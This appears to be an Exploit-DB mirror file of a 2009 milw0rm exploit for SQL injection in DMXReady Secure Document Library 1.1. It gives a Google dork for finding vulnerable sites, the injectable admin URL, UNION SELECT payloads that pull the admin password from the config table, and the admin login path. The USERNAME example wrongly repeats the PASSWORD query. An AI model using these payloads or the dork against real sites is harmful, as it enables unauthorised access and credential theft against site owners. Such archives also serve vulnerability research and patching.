exploit-db-mirror/exploits/php/webapps/7787.txt
Offensive Security b4c96a5864 DB: 2021-09-03
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

46 lines
No EOL
1.6 KiB
Text

*******************************************************************************
# Title : DMXReady Secure Document Library <= 1.1 Remote SQL Injection Vulnerability
# Author : ajann
# Contact : :(
# S.Page : http://www.dmxready.com
# $$ : 189.97 $
# Dork : inurl:inc_securedocumentlibrary.asp
# DorkEx :
http://www.google.com.tr/search?hl=tr&q=inurl%3Ainc_securedocumentlibrary.asp&btnG=Ara&meta=
****Stop Attack ABD and ISRAEL !
*******************************************************************************
*******************************************************************************
[[SQL]]]---------------------------------------------------------
http://[target]/[path]//admin/SecureDocumentLibrary/MembersAreaManager/components/CategoryManager/upload_image_category.asp?cid=[SQL Inject]
You Find-> http://[target]/[path]/applications/SecureDocumentLibrary/inc_securedocumentlibrary.asp
Edit -> http://[target]/[path]/admin/SecureDocumentLibrary/MembersAreaManager/components/CategoryManager/upload_image_category.asp?cid=
[SQL Inject]
Example:
USERNAME->
/admin/SecureDocumentLibrary/MembersAreaManager/components/CategoryManager/upload_image_category.asp?cid=-12321 union select 2,Security_AdminPassword,4,5,6,0 from tblConfig
PASSWORD->
/admin/SecureDocumentLibrary/MembersAreaManager/components/CategoryManager/upload_image_category.asp?cid=-12321 union select 2,Security_AdminPassword,4,5,6,0 from tblConfig
Admin Login->
/admin/SecureDocumentLibrary/admin.asp
[[/SQL]]
"""""""""""""""""""""
# ajann,Turkey
# ...
# Im not Hacker!
# milw0rm.com [2009-01-14]